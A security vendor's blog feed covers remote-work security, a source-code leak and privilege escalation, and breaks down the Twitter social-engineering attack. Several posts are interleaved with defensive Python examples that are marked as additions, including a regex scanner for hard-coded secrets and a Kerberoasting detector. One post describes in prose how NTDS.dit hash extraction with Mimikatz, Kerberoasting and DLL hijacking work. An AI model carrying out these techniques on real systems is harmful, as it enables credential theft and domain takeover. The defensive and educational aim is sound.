Of the over 3,000 IT professionals in the U.S., UK, France, and Germany surveyed for the CyberArk study, 94% expressed confidence in their ability to secure a remote workforce. However, only 40% have increased security protocols or made any other significant changes to their systems. Confidence will only get you so far, after all. The “attack surface” – the collective term for all the areas through which a system can be breached – has widened significantly for everyone during the pandemic. Resources are stretched and there are fewer centralized hubs for access.

Simply reducing the number of passwords your employees need through Single Sign-On authentication, or employing measures such as Multi-factor Authentication, App Gateway and other forms of device security management, can help IT departments ensure stronger defenses without adding additional layers of friction to the sign-on experience (and without taxing their already stretched resources). The timeline towards Zero Trust security has been accelerated, but there are still a lot of details to be worked out for most companies.

Everyone Has to Do Their Part

Even after adopting SSO or MFA practices, IT departments have not eliminated the threat of breach – because, to paraphrase the urban legend, the calls are coming from inside the house. In other words, if you can’t get your workers to change their habits, there’s only so much adding these backend security measures can do.

Work habits have changed, and it goes a lot deeper than just forgoing pants on a video conference. Something about being at home makes people relaxed – which is a good thing for their mental health, but not so good for security on their work devices. Leaving browsers open, letting children Google homework help, online shopping during a boring meeting — these habits can and do widen the attack surface even more.

“This forgetfulness when it comes to security can be especially true for those who are not used to working or learning at home: People working from home get easily distracted, especially if they are normally used to working in the office, and they will mix work with personal email and web browsing,” says Colin Bastable, CEO of security awareness training company Lucy Security.

If the confidence most IT departments feel about their ability to secure multiple devices isn’t backed up by a slight increase in friction at the access points — and focused and consistent education of how corporate devices need to be handled in the wild — then the new work from home reality should brace for even more cyberattacks than we’ve already seen.

One of the unintended consequences of the COVID-19 pandemic will likely be increased Zero Trust adoption that further embraces cloud services, reduces reliance on VPNs, and enables employees to truly work from anywhere with minimal disruption.

We have the confidence and know-how, we just need more action.

Source Code Leak Lesson: Secure Development Environments https://www.cyberark.com/blog/source-code-leak-lesson-secure-development-environments/ Fri, 31 Jul 2020 17:28:10 +0000 https://www.cyberark.com/?p=97318

Once again we are seeing how vulnerable development environments are and how easily they can be exploited, with the recent news of a massive trove of leaked code from 50+ enterprises across multiple industries, including tech, finance, retail, manufacturing, food and eCommerce. Tillie Kottman, a Swiss software developer, collected leaked code into a public GitLab repository that is accessible by anyone. So how did they get the source code of these major players? Most of it was found by scanning misconfigured DevOps applications and third-party sources.

Aside from the obvious intrusion a leak like this invokes, what makes it particularly alarming is the number of hard coded credentials that were exposed. Hard coded credentials are passwords, access keys and other types of secrets stored in the source code, sometimes even as plain text. Each of these credentials could be used by an attacker to gain a foothold on that company’s cloud, development environment or IT infrastructure and, potentially, lead to further data leaks or other cybersecurity nightmares.

Fortunately, there are some valuable lessons to be learned here:

  1. Hard Coded Credentials Are A Serious Risk

While it’s unclear if hard coded credentials played a role in making the leak possible, the leak certainly made those credentials available to anyone who might visit GitLab. This would make it extremely easy for a cyber attacker to steal passwords and other secrets and potentially start using them to gain privileged access to any of these companies’ IT infrastructure. Some of the companies involved in the data leak also hard coded their cloud access keys, which would allow a cyber attacker to takeover a company’s cloud environment or steal sensitive information the company has on the cloud.
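A scanner for the hard coded credentials and cloud access keys described above, as an added example that is not from the post or from CyberArk: it flags AWS access key IDs (the public AKIA format; the sample uses the key ID from AWS's own documentation), private key headers and quoted password/token assignments, and skips placeholders and low-entropy values so it can sit in a pre-commit hook. The file contents are constructed.

```python
"""Hard-coded credential scanner (added example; not CyberArk's code).

Looks for the kinds of secrets the post describes: cloud access keys,
private keys and quoted password/token assignments in source or config
text. The AWS key ID format (AKIA + 16 chars) is public; the sample
inputs are constructed, and the key ID is the one AWS uses in its docs.
"""
import math
import re
from collections import Counter
from dataclasses import dataclass

RULES = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("private_key_block",
     re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
    # name = "literal"  /  name: 'literal'   (literal at least 8 chars)
    ("generic_secret_assignment",
     re.compile(r"(?i)(password|passwd|secret|api[_-]?key|access[_-]?key|token)"
                r"\s*[:=]\s*['\"]([^'\"]{8,})['\"]")),
]

# Values that are obviously not real secrets.
PLACEHOLDERS = {"changeme", "password", "example", "xxxxxxxx", "your_key_here"}


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking secrets score well above words."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_like_placeholder(value: str) -> bool:
    v = value.lower()
    return v in PLACEHOLDERS or "${" in v or (v.startswith("<") and v.endswith(">"))


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    rule: str
    snippet: str   # the line with the secret masked, safe to log


def scan_text(path: str, text: str, min_entropy: float = 3.0) -> list:
    """Return Findings for every line of `text` that carries a likely secret."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            secret = m.group(2) if rule == "generic_secret_assignment" else m.group(0)
            if rule == "generic_secret_assignment" and (
                looks_like_placeholder(secret) or shannon_entropy(secret) < min_entropy
            ):
                continue  # placeholder or dictionary-like value, not a real secret
            findings.append(Finding(path, line_no, rule, line.replace(secret, "<redacted>")))
    return findings


def has_secrets(path: str, text: str) -> bool:
    """Boolean form for a pre-commit hook: any finding should block the commit."""
    return bool(scan_text(path, text))


# Constructed sample inputs (not real credentials).
SAMPLE_CONFIG = """\
# settings.py (constructed sample)
db_host = "db.internal.example"
db_password = "changeme"
api_key = "Xy7qZ9pLm2nB4vC8"
aws_access_key_id = "AKIAIOSFODNN7EXAMPLE"
token = os.environ["SERVICE_TOKEN"]
"""
SAMPLE_KEYFILE = "-----BEGIN RSA PRIVATE KEY-----\n<key material omitted>\n"

if __name__ == "__main__":
    for f in scan_text("settings.py", SAMPLE_CONFIG) + scan_text("id_rsa", SAMPLE_KEYFILE):
        print(f"{f.path}:{f.line_no} [{f.rule}] {f.snippet}")
```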

  2. Developers Need to Take Security Seriously

Some of the developers contacted about the code leak weren’t concerned about their code being exposed. This unfortunate example highlights a key issue: some developers are less concerned about security than they should be. But exposed code can quickly lead to big problems – like this data leak – and that’s a risk worth taking seriously.

Consider: even before this trove of source code was found and shared on GitLab, it was unprotected and available to attackers. Not only could those attackers use the code to steal intellectual property and potentially any hard coded credentials or cloud access keys, they could get way more creative. For example, an attacker that can access the code could also add their own malicious code into automated builds and include it in the organization’s code base.

  3. Protecting Code Repositories Is Really Important

The only information currently known about the origin of the source code is that it was found by scanning third-party sources and misconfigured DevOps applications. However, it is likely that at least some code was taken from a repository. After all, code repositories are established as an essential part of the modern development process. It’s a familiar scenario. The developers who created the leaked source code probably thought they were putting code into a private repository – but that wasn’t the case.

Either that code was inadvertently made public or a misconfiguration or stolen credential was used to expose it – which is an easy mistake, but a dangerous one. It’s essential to not only make sure the repository is correctly configured, but also to protect the credentials used by the developers to access and configure the repository.

  4. Bring Developers and Security Teams Together to Secure DevOps Environments

It’s not exactly a surprise that poorly protected DevOps tools and applications – and access to those tools – contributed to this leaked code. The trend toward greater independence for developers has introduced risks and cultural changes that create clear security challenges. Specifically, the responsibility for managing risk in development environments is too often shifting from IT and security teams to development and DevOps teams.

In today’s high velocity developer culture, low-security shortcuts often flourish and traditional security processes are not always easy to integrate. To secure developers without slowing them down, the security team must work with their developer and DevOps counterparts to follow cybersecurity best practices. The goal is to find the right balance of securing the development environments while not overburdening developers. With developers and security teams working together, it’s much harder for something like this code leak to happen to you.

Next Steps

If organizations learn nothing else from this leak, they should learn that security can’t – and shouldn’t – be separated from development. The use of security best practices might have prevented these companies from having their credentials exposed in a public repository – and the potential leaks, breaches and takeovers that it could lead to. Adding security into the development process after the fact can be difficult and disruptive. Instead, involve security right from the beginning to keep credentials and repositories secure.

To find out more about how to address these issues, check out the CISO View – Securing Privileged Credentials in DevOps and Cloud Environments for insights from 13 global 2000 CISOs on how they have worked within their organizations to secure their DevOps environments. Or watch a video animation or read a white paper on the vulnerabilities exposed by development environments and why it is so critical for organizations to secure their development environments.

7 Best Practices for Securely Enabling Remote Work https://www.cyberark.com/blog/7-best-practices-for-securely-enabling-remote-work/ Thu, 30 Jul 2020 14:30:18 +0000 https://www.cyberark.com/?p=97286 Privileged Access Management

At Impact Live 2020 we spent a lot of time discussing strategies for maintaining a strong cybersecurity posture in the age of remote work. Today’s users need flexibility to do their jobs efficiently with the ability to access business systems at any time and in any place. However, with this new way of working come new security challenges – and those challenges require modern solutions.

Here are seven best practices to help remote workers stay productive and secure without adversely affecting operations or established business practices.

  1. Deploy Single Sign-On (SSO) and Multi-Factor Authentication (MFA). With SSO, you can leverage a central identity provider to manage user authentication and grant access to applications and resources through a single set of login credentials. This enables you to improve security through stronger password policies, increase productivity with simplified access to all the resources employees need to do their jobs and make it easier for your IT department to meet compliance requirements around access. MFA adds an additional layer of protection to corporate resources. With MFA, you can firmly establish that users are who they say they are by requiring them to pass multiple authentication challenges. For example, you can ask users to provide something they know – such as a password – and something they have – such as a one-time code sent to their mobile devices. You can use MFA to secure access to applications, workstations, virtual desktops, VPNs and more. For users who aren’t connecting from directly within the corporate network, MFA is essential for preventing the use of compromised credentials to access protected resources.
  2. Implement least privilege on endpoints to protect sensitive data and applications. Only providing end users and administrators with the absolute minimum levels of privileged access they require (a.k.a. the principle of least privilege) dramatically reduces the attack surface. One way of achieving this is to strip away unneeded local administrator rights from workstations to prevent endpoints from becoming compromised and enabling lateral movement. This reduces the risk of malware or ransomware being introduced to the environment, which can then be easily spread.
  3. Block RDP exposure from workstations. Remote Desktop Protocol (RDP) exposure has been at the root of many high-profile breaches – especially since workforces have become increasingly remote. Isolating sessions reduces the potential for endpoints – historically the weakest links of network access – to expose critical systems. Additionally, layering in the automatic recording of each session with behaviors analyzed in real-time helps quickly detect and remediate suspicious behavior if and when it arises.
  4. Reduce the overall reliance on VPNs. The surge of remote work introduced a dramatic uptick in VPN usage. In a recent survey from CyberArk, 63% of employees reported using VPNs to access critical business systems. Attackers have long targeted VPNs because they provide access to the entire internal network. VPNs are distinctly not designed to provide granular access to critical systems and applications and can take a long time to set up. These tools often take so much manual work to set up and operationalize that it takes away from the real goal at hand for security teams – reducing risk.
  5. Set up policy to either allow, block or restrict applications. In the age of remote work, unnecessary calls to the help desk are skyrocketing. With allow/block/restrict policies, administrators can enable remote users to access the systems that they require for their jobs without any additional hassles. Another way of reducing help desk calls is to enable users to access trusted apps without needing to call the helpdesk. This frees up IT resources to focus on more strategic initiatives while also helping end users more efficiently and effectively do their jobs.
  6. Deploy self-service initiatives where applicable. Similar to the above, anything an organization can do to reduce unneeded help desk calls can be a massive time and labor saver. Establishing MFA-protected self-service password reset and account unlocking enables end users to reset their own corporate passwords and unlock their own accounts. Self-service application and server access requests further enable end users and remote vendors to make requests for access to applications, servers and other critical internal systems, enabling IT and management to approve access without filing helpdesk tickets. Self-service MFA enroll/replace allows end users to enroll new authenticators and replace and reset passwords. These capabilities also let end users replace lost or stolen authenticators without needing to file tickets. Finally, self-service also introduces the ability to request access to applications or servers without adding load to the help desk.
  7. Provide just-in-time provisioning for third-party users. The push to mobilize the workforce has also had a clear impact on the number of third-party vendors that organizations rely on. These types of users present new challenges as they are not part of the company directory and can be challenging to manage and keep track of. You can dramatically reduce the attack surface by introducing solutions to automatically provision and deprovision access with a one-time onboarding process. This way vendors will have just-in-time access – just the access they need for just as long as they need it – without requiring manual work from security or IT administrators to provision and revoke access.

Balancing security and convenience is a struggle for organizations in the age of remote work. With many employees working remotely with no end date in sight, the answer to this dilemma is more important than ever. By following these best practices, organizations can provide their remote workforce with secure access that doesn’t interfere with productivity or business practices.

Couldn’t make it to Impact Live? No problem. Sign up for Impact Live on demand to view all the sessions at your convenience.

The Blurring Line Between Privileged and Non-Privileged Users https://www.cyberark.com/blog/the-blurring-line-between-privileged-and-non-privileged-users/ Tue, 28 Jul 2020 16:42:44 +0000 https://www.cyberark.com/?p=97127 Privileged Access Management

“Identity truly is the new perimeter” was one of the big topics at Impact Live. This is because organizations are dealing with a new set of operational and security challenges related to introducing more endpoints and the reality of their workforce operating entirely remote for the indefinite future.

Consider this: in today’s world, to avoid user friction and not slow down productivity, it’s possible to elevate a non-privileged account (i.e. a standard business user on a Windows machine) to enable privileged access, so it isn’t enough to just consider the accounts that have been granted privileges – they must be consistently monitored and managed. This creates a growing need to have controls in place to secure all identities – human and non-human – that have the potential to gain privileged access to critical systems and assets. It’s important to consider that this heightened level of access is exactly what attackers seek in their mission to disrupt a business or steal sensitive information.

At a deep technical level, let’s review three specific examples where a traditionally non-privileged user can gain privileged access.

Example 1: The Backup Administrator

The lifeblood of every organization is the data that it possesses. Whether it’s customer data, intellectual property or financial reports and statements, there needs to be a strategy in place for determining how that data is defined and managed for backup. Backup and recovery systems will help prevent data loss during an event, and the backup admin is ultimately responsible for this inherently challenging task.

A backup admin, who only has access to permissions specifically pertaining to Backup and Recovery (BRS) systems, has the ability to take the archive and restore the NTDS.Dit file, which is a flat file representation of the Active Directory (AD) that is used in normal cases for system state recoveries. This file contains all AD objects, including accounts, passwords, keys and certificates, to name just a few.

Once the NTDS.Dit file has been extracted from the backup archive, a nefarious insider can then use tools like Mimikatz to extract all the hashes for all accounts in AD, which would include the KRBTGT account. The KRBTGT is essentially the signing account for all objects in AD and the main target for a DCSync attack. Once the KRBTGT is compromised, the attacker can then take that information back to the live environment and use the exported/cracked hashes to compromise that environment.

One of the worst aspects of this attack is that the attacker has all the time in the world to perform these activities undetected, since they can perform them outside of the corporate network where intrusion detection software or other security technology would not be a factor.

Figure 1. The malicious backup admin restores the NTDS.dit file from the backup server. From there they can pull it offline to crack the hashes (outside of the scope of any counter measure) and then bring it to the live environment.

If interested in learning more, you can see Kerberoasting and other similar advanced attacks in action by attending the CyberArk PAM Summer Series.

Example 2: The Service Account

A service account is a non-human account that is often used by an application or service to interact with the operating system to perform things like scheduled tasks. A big concern from a security perspective is the fact that the majority of organizations never perform an audit on their service accounts. Let’s look at the svc_sql account, which is created during an install of Microsoft SQL Server.

In this example, we will assume the attack originates from the outside and the attacker has gained an initial foothold into the organization from a compromised endpoint. To obtain credentials tied to the organization’s service accounts, the attacker can perform Kerberoasting, which takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs). After the attacker dumps the Kerberoasting payload, a scan can be performed to determine the vulnerability of the service accounts in AD. Once enumerated, the attack would be performed on a specific account, which will return the hash of the SPN that was selected.

Once the hash has been obtained, it can be cracked utilizing the John the Ripper tool, returning the clear text value of the password. If no additional preventative measures have been taken to lock down interactive logons and place service accounts in an authorized hosts list, the attacker could interactively log into other hosts on the network as the service account. In this example, the attacker could now very easily compromise the Domain Controller by logging in as the svc_sql account. Game over.

Figure 2. [1] A TGT is requested with the NTLM hash provided; [2] The TGT is received with the encrypted KRBTGT hash; [3] TGS is requested for the server and is presented with the TGT; [4] The TGS encrypted with the server account hash is received by the server; [5] The TGS encrypted with the server account is presented for service and [6] it’s used when manual authentication is required.
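Detection logic for the Kerberoasting sequence described in Example 2, as an added example that is not from the post or from CyberArk: a Kerberoast burst shows up in the domain controller’s Security log as one principal requesting service tickets (event 4769) for many distinct user-account SPNs in a short window, usually with RC4 encryption (TicketEncryptionType 0x17) so the returned hash is cheaper to crack. The event records below are constructed and flattened into key=value form from the 4769 fields; the field names are the event’s own.

```python
"""Kerberoasting detection over Windows Security event 4769 records.

Added example, not CyberArk's code. Flags a requester that asks for
RC4-encrypted service tickets to many distinct user-account SPNs inside a
short window. The records are constructed; real events would be pulled
from the DC's Security log and mapped to the same fields.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

RC4_HMAC = 0x17   # TicketEncryptionType for RC4-HMAC (what Kerberoasting asks for)
AES256 = 0x12     # AES256-CTS-HMAC-SHA1-96 (normal for modern domains)


@dataclass(frozen=True)
class TgsRequest:
    time: datetime
    requester: str   # 4769 TargetUserName: the account asking for the ticket
    service: str     # 4769 ServiceName: the account the SPN belongs to
    enc_type: int    # 4769 TicketEncryptionType
    ip: str          # 4769 IpAddress


def parse_4769(line: str) -> TgsRequest:
    """Parse one constructed 'key=value|key=value' record of a 4769 event."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return TgsRequest(
        time=datetime.fromisoformat(fields["time"]),
        requester=fields["TargetUserName"],
        service=fields["ServiceName"],
        enc_type=int(fields["TicketEncryptionType"], 16),
        ip=fields["IpAddress"],
    )


def is_roastable_target(service: str) -> bool:
    """Computer accounts ($) have long random passwords and krbtgt is not a
    Kerberoast target; only user-account SPNs matter for this detection."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoasting(requests, window=timedelta(minutes=5), threshold=5):
    """Return {requester: set(services)} for every requester that asked for RC4
    service tickets to at least `threshold` distinct user-account SPNs within
    any `window`-long span of time."""
    by_requester = defaultdict(list)
    for r in sorted(requests, key=lambda r: r.time):
        if r.enc_type == RC4_HMAC and is_roastable_target(r.service):
            by_requester[r.requester].append(r)
    alerts = {}
    for requester, reqs in by_requester.items():
        start = 0  # sliding window over the time-sorted RC4 requests
        for end in range(len(reqs)):
            while reqs[end].time - reqs[start].time > window:
                start += 1
            distinct = {x.service for x in reqs[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[requester] = distinct
                break
    return alerts


# Constructed records: jdoe asks for RC4 tickets to six SPNs in four seconds
# (one is a computer account and is ignored); the rest is normal AES traffic.
SAMPLE_4769 = """\
time=2020-07-28T09:00:01|TargetUserName=jdoe@CORP.EXAMPLE|ServiceName=svc_sql|TicketEncryptionType=0x17|IpAddress=10.0.0.25
time=2020-07-28T09:00:02|TargetUserName=jdoe@CORP.EXAMPLE|ServiceName=svc_web|TicketEncryptionType=0x17|IpAddress=10.0.0.25
time=2020-07-28T09:00:02|TargetUserName=jdoe@CORP.EXAMPLE|ServiceName=svc_backup|TicketEncryptionType=0x17|IpAddress=10.0.0.25
time=2020-07-28T09:00:03|TargetUserName=jdoe@CORP.EXAMPLE|ServiceName=svc_mssql02|TicketEncryptionType=0x17|IpAddress=10.0.0.25
time=2020-07-28T09:00:03|TargetUserName=jdoe@CORP.EXAMPLE|ServiceName=svc_sharepoint|TicketEncryptionType=0x17|IpAddress=10.0.0.25
time=2020-07-28T09:00:04|TargetUserName=jdoe@CORP.EXAMPLE|ServiceName=FS01$|TicketEncryptionType=0x17|IpAddress=10.0.0.25
time=2020-07-28T09:05:00|TargetUserName=asmith@CORP.EXAMPLE|ServiceName=svc_sql|TicketEncryptionType=0x12|IpAddress=10.0.0.40
time=2020-07-28T09:06:00|TargetUserName=WS07$@CORP.EXAMPLE|ServiceName=FS01$|TicketEncryptionType=0x12|IpAddress=10.0.0.41
"""

if __name__ == "__main__":
    events = [parse_4769(l) for l in SAMPLE_4769.splitlines()]
    for who, spns in detect_kerberoasting(events).items():
        print(f"possible Kerberoasting by {who}: {len(spns)} user SPNs -> {sorted(spns)}")
```

Tuning the window and threshold to the environment matters: a single RC4 request from an old application is noise, while dozens of distinct SPNs in seconds from one workstation account is the pattern the post describes.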

Example 3: Dynamic Link Libraries (DLL)

DLLs are files loaded by Windows binaries that contain additional functionality that can be used to make programming within the Windows environment easier. Whenever an executable within Windows opens up or runs in some way, it will frequently attempt to load a DLL within the Windows environment.

Oftentimes, the binary can attempt to load DLLs that don’t exist for a variety of reasons, such as older code not being removed. If this occurs within a directory that’s writable by a non-privileged user and that binary is run as part of a service under an elevated context, an attacker can easily create a malicious DLL in its place, store it in that writable directory and have it execute under the elevated context.

Moreover, even if the DLL does exist, an attacker can still hijack the execution flow. For example, if safe DLL search mode is enabled and the DLL that the binary is calling does not exist within its current directory, then, as long as the current directory is writeable, an attacker can install a malicious DLL there and have it run the next time the elevated service or program attempts to run.

Figure 3. An attacker places a malicious DLL within the executable’s own directory and the exe finds the malicious DLL first and loads that one, never reaching the legitimate one in the system directory.

From here, the attacker can elevate to whatever context the user who executed the process had – in most cases this is the admin on the local machine. Not only was the account or permissions stolen, but the attacker could perform malicious activity under the guise of that admin. They can execute any arbitrary code they’d like to steal or delete data or establish persistence on the machine to monitor activities and perform reconnaissance. Local admin privileges on a machine also give the attacker the ability to dump local passwords from the Local Security Authority Subsystem Service (LSASS), again using tools like Mimikatz to find additional domain credentials that could be used to perform lateral movement across the network.

Identity Security is the Future

CyberArk’s mission for Identity Security is to provide a SaaS-based Identity Security platform that offers secure access to any user accessing any application or system (from hybrid to multi-cloud) from anywhere and using any device. All types of access will be provided on a unified platform, leveraging artificial intelligence to automatically apply the needed privileged access security controls to each session based on the level of access that is required and the associated risk of the session.

CyberArk’s investment in continuous innovation drives enhanced privileged access management capabilities across our portfolio, such as session isolation, session recording, continuous authentication and just-in-time access to the wider range of identities – whenever privileged access is required.

Want More From Impact Live?

Missed the event? No problem. Sign up for Impact Live on-demand to view all the recorded keynotes, breakout sessions and all other content from the original event.

Many thanks to Len Noe, Asaf Hecht and Arash Parsa from CyberArk for their contributions to this blog.

What Twitter Attack Says on Human Nature, Social Engineering https://www.cyberark.com/blog/what-twitter-attack-says-on-human-nature-social-engineering/ Fri, 24 Jul 2020 12:00:50 +0000 https://www.cyberark.com/?p=96952 Social Engineering

Last week, Twitter suffered a breach that led to the compromise of numerous high-profile accounts, including those of Barack Obama, Joe Biden, Jeff Bezos and Elon Musk. I took the opportunity to speak with Nir Chako, Security Research Team Leader for CyberArk Labs and former Red Teamer, to get his breakdown on the attack.

While investigations are ongoing, Twitter reported it was the victim of a “coordinated social engineering attack.” The company confirmed that threat actors targeted and successfully manipulated a small group of employees and used their credentials to gain unauthorized access to an administrative tool that is “only available to internal support teams.”

According to Chako, social engineering attacks like this one are “so effective because they use psychological manipulation to convince a person to take an action or divulge sensitive information that they shouldn’t. In fact, cyber attackers are the ultimate psychologists.”

Using these psychological tricks, the attackers were able to hijack Twitter accounts then post messages to dupe social media users into donating Bitcoin payments to fraudulent causes.

Originally thought to be the work of experienced nation-state attackers, it now appears the social engineering attack was conducted by a relatively unsophisticated group of hackers motivated solely by financial gain. Considering how powerful social media has become, their intentions, and corresponding global impact, could have been far worse.

The Twitter attack highlights the dangers of unsecured privileged access to critical applications, while reminding us how quickly any credential or identity can become privileged under certain conditions. If not properly secured, external attackers and malicious insiders alike can use them to unlock critical assets – currency, intellectual property, sensitive client records and more – causing irreparable harm to your business and reputation.

Social Engineering and the Human Opportunity

According to the 2020 Verizon DBIR, social engineering attacks keep increasing year-over-year. This makes sense since attackers nearly always look for the easiest point of entry. In most cases, social engineering techniques are a sure-fire way to get in the door. Wash. Rinse. Repeat.

In most cases, attackers utilize phishing emails to spoof their victims, developing highly customized messages that drive urgency or create fear. According to the 2020 DBIR, these social attacks arrive by email 96% of the time.

According to Chako, for attackers, “Every human represents an opportunity, no matter how strong their employer’s technological defenses may be. By targeting specific individuals, attackers can carefully study their behaviors, motivations, weaknesses – even their secrets – to build trust and credibility.”

Deconstructing the Twitter Attack

Chako provided me with his deconstruction of how the Twitter attack may have played out, explaining how the attackers successfully manipulated not one but two target victims: Twitter and the public at large. Below you’ll find his complete breakdown of the events.

PHASE 1

  1. Conduct Reconnaissance. The attackers likely searched social media profiles, like Twitter and LinkedIn, to pinpoint members of Twitter’s internal support team – specifically system admins that likely had access to the internal platform.
  2. Socially Engineer Twitter Employee(s). Using personal information gleaned from this reconnaissance work, the attackers successfully spoofed or coerced at least one Twitter employee and obtained their credentials.
  3. Gain Access to Target System. Using these credentials, the attackers were able to either directly access the internal admin platform OR use them to move laterally and escalate privileges until they could access the system. By using legitimate credentials, they were able to operate under the radar without being discovered.

PHASE 2

  1. Compromise Twitter Accounts. With access to, and control of, the internal platform, the attackers targeted 130 accounts and successfully compromised 45 by changing their associated emails without notifying their owners. If multi-factor authentication (MFA) was in place on an account, the attackers likely disabled this security layer and then issued a password change, which was sent to the new email address.
  2. Socially Engineer the Twitterverse. With these newly issued passwords in hand, the attackers began posting from the compromised Twitter accounts. This time, they preyed on Twitter users who might see the messages and feel compelled (out of compassion, peer pressure, political leanings, sense of urgency, etc.) to donate Bitcoin – with the influential figure’s promise they would double the amount. Here’s what they posted to Joe Biden’s verified account, for example:
  3. Cash In. In just three hours, the fraudsters collected $118,000 in what the New York Times called “one of the most brazen online attacks in memory.”

Six Steps for Mitigating Risk of a Social Engineering Attack

Humans will always make mistakes and there’s no way to prevent social engineering attacks 100% of the time. The good news is there are specific steps your organization can take to significantly lower attackers’ success rates.

  1. Raise Awareness. Ongoing employee education and training on cybersecurity best practices – including how to spot a spoof – is a critical first step. Remember, urgent requests for payment or sensitive information should always raise red flags and require validation.
  2. Use Strong Passwords. As many employees continue to work from home, strong password policies are more important than ever. Start with the basics: Use strong passwords; don’t use them for multiple accounts; don’t share them and don’t save them in browsers.
  3. Prioritize Privileged Access Management (PAM). Privileged access is the route to your most critical assets. One of the best proactive ways to reduce risk is to implement strong PAM controls like the principle of least privilege to prevent credential theft, block lateral and vertical movement and stop privilege escalation and abuse. The Twitter attack should have every security leader asking right now: how are we identifying what our most critical systems, data and infrastructure are and who has access? Who is considered a privileged user (this includes business users) and what steps are we taking to manage, monitor and protect that access?
  4. Create a Conditional Access Policy That Mandates MFA. Based on Microsoft studies, an account is more than 99.9% less likely to be compromised if MFA is in place. Think of it this way: single factor authentication is a single point of failure. With conditional access, if a user wants to access a sensitive resource, they must first perform MFA to reach it. This approach also helps organizations better balance security and user productivity.
  5. Use Dual Control Systems. No employee should have full access to sensitive platforms – your organization’s critical infrastructure – without multiple layers of security. Dual control means a duo is responsible for an action. For example, when a user tries to access a sensitive system, a request is created and must be confirmed by a second authorized user. It’s similar to the military’s “two-person concept,” designed to prevent malicious or accidental missile launches.
  6. Monitor and Respond to Anomalous Activity. By continuously monitoring privileged sessions and tapping analytics tools to automatically identify risky behavior or anomalous activity, your SOC team should be alerted immediately when something goes wrong – so you can respond fast.
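As an added illustration (not code from the original post), the following Python module implements the gate described in steps 4 and 5 above: a request to reach a sensitive system is only granted when the requester has completed MFA and a different, authorized person confirms it within a time window, with every decision written to an audit trail. All class, function and user names, the approval window and the scenarios in `demo()` are constructed assumptions.

```python
"""Added example: a dual-control gate for privileged access requests.

Not from the original post. A request to reach a sensitive system is
granted only when the requester has completed MFA (conditional access)
and a *second*, authorized person confirms it within a time window.
All names and policy values are constructed assumptions.
"""
from dataclasses import dataclass, field
from typing import Optional

APPROVAL_WINDOW_SECONDS = 15 * 60  # constructed policy value


@dataclass
class AccessRequest:
    request_id: str
    requester: str
    target_system: str
    created_at: float           # unix seconds
    mfa_verified: bool          # conditional-access outcome for the requester
    approver: Optional[str] = None
    approved_at: Optional[float] = None
    status: str = "pending"     # pending | approved | denied | expired
    audit: list = field(default_factory=list)


class DualControlGate:
    """Two-person approval for access to sensitive systems."""

    def __init__(self, authorized_approvers: dict[str, set[str]]):
        # target_system -> set of users allowed to confirm requests for it
        self.authorized_approvers = authorized_approvers

    def create(self, request_id: str, requester: str, target_system: str,
               now: float, mfa_verified: bool) -> AccessRequest:
        req = AccessRequest(request_id, requester, target_system, now, mfa_verified)
        if not mfa_verified:
            # Conditional access: no MFA, no request (step 4)
            req.status = "denied"
            req.audit.append("denied: requester has not completed MFA")
        else:
            req.audit.append("pending: awaiting second-person confirmation")
        return req

    def confirm(self, req: AccessRequest, approver: str, now: float) -> bool:
        """A second authorized user confirms. Returns True if access is granted."""
        if req.status != "pending":
            req.audit.append(f"rejected: request is {req.status}")
            return False
        if now - req.created_at > APPROVAL_WINDOW_SECONDS:
            req.status = "expired"
            req.audit.append("expired: approval window elapsed")
            return False
        if approver == req.requester:
            # The "duo" must be two distinct people (step 5)
            req.audit.append("rejected: requester cannot approve own request")
            return False
        if approver not in self.authorized_approvers.get(req.target_system, set()):
            req.audit.append(f"rejected: {approver} not authorized for {req.target_system}")
            return False
        req.approver = approver
        req.approved_at = now
        req.status = "approved"
        req.audit.append(f"approved by {approver}")
        return True


def demo() -> dict:
    """Run the constructed scenarios and return each request's final status."""
    gate = DualControlGate({"admin-tool": {"alice", "bob"}})
    t0 = 1_600_000_000.0
    results = {}

    # 1) MFA done, different authorized approver, inside window -> approved
    r1 = gate.create("r1", "carol", "admin-tool", t0, mfa_verified=True)
    gate.confirm(r1, "alice", t0 + 60)
    results["r1"] = r1.status

    # 2) requester tries to approve own request -> stays pending
    r2 = gate.create("r2", "alice", "admin-tool", t0, mfa_verified=True)
    gate.confirm(r2, "alice", t0 + 60)
    results["r2"] = r2.status

    # 3) no MFA -> denied before any approval is considered
    r3 = gate.create("r3", "carol", "admin-tool", t0, mfa_verified=False)
    gate.confirm(r3, "bob", t0 + 60)
    results["r3"] = r3.status

    # 4) confirmation arrives after the window -> expired
    r4 = gate.create("r4", "carol", "admin-tool", t0, mfa_verified=True)
    gate.confirm(r4, "bob", t0 + APPROVAL_WINDOW_SECONDS + 1)
    results["r4"] = r4.status

    # 5) approver not authorized for that system -> stays pending
    r5 = gate.create("r5", "carol", "admin-tool", t0, mfa_verified=True)
    gate.confirm(r5, "dave", t0 + 60)
    results["r5"] = r5.status
    return results


if __name__ == "__main__":
    for rid, status in demo().items():
        print(rid, status)
```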

The Twitter attack encapsulates the struggle many organizations have today: how to best secure the exploding number of credentials and identities that require privileged access to sensitive systems and data. There’s a critical need for a comprehensive approach to privileged access management that reduces risk, makes security teams’ lives easier by using automation wherever possible and empowers users to do their jobs as efficiently as possible.

Looking for more insights? Check out our Labs Team’s latest threat research and explore top-of-mind security vulnerabilities with our Red Team in this on-demand webinar.

]]>
A Look Back at the Impact Live 2020: Our Largest Impact Yet https://www.cyberark.com/blog/a-look-back-at-the-impact-live-2020-our-largest-impact-yet/ Thu, 23 Jul 2020 12:00:51 +0000 https://www.cyberark.com/?p=96930 Privileged Access Management and Identity Access Management

